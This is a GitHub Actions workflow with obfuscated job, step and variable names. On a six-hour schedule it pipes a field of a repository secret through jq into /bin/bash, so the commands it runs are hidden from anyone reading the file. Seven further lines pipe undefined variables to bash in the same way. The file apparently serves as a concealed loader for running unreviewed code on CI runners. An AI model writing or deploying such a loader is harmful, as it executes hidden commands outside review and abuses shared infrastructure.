name: gantingxi3810
on:
  workflow_dispatch:
  schedule:
    - cron: '14 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gantingxi3810
        env:
          gn2368: ${{ secrets.gn2368 }}
        run: |
          echo $gn2368 | jq -r .pies81807 | /bin/bash
          echo $wf69188 | jq -r .r26830 | /bin/bash
          echo $qcry326 | jq -r .lfbg67 | /bin/bash
          echo $lcpxj110 | jq -r .dz0821 | /bin/bash
          echo $zuw6490 | jq -r .qh2452 | /bin/bash
          echo $lcmf02353 | jq -r .facn774 | /bin/bash
          echo $jfdpv765 | jq -r .dn1 | /bin/bash
          echo $t87668 | jq -r .buxj845 | /bin/bash

